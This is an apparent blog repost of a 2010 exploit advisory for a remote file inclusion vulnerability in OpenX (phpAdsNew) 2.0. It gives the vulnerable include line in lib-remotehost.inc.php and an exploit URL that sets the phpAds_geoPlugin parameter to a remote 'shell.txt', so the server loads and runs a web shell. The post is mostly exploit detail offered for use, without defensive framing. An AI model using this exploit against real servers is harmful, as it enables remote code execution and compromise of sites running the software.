Monday, April 4, 2011

OpenX (phpAdsNew) Remote File inclusion Vulnerability

=====================================================
OpenX (phpAdsNew) Remote File inclusion Vulnerability
=====================================================
# Exploit Title: OpenX (phpAdsNew) Remote File inclusion Vulnerability
# Date: 2010/07/20
# Author: Mhiman HNc
# Script url:
http://www.opensourcescripts.com/dir/PHP/Ad_Management/phpadsnew_11.html
# download Script:
http://sourceforge.net/projects/phpadsnew/files/Current%20Release/Openads%202.0.11-pr1/Openads-2.0.11-pr1.zip/download
# Version:2.0
# Tested on: Windows
:::::::::::::::::::::::::
=================Exploit=================

-=[ vuln c0de ]=-

include_once ($phpAds_geoPlugin);
/libraries/lib-remotehost.inc.php
Line:109

----exploit----


http://

{localhost}/{path}/libraries/lib-remotehost.inc.php?phpAds_geoPlugin==shell.txt?

No comments:

Template by : mhiman@ hacker-newbie.org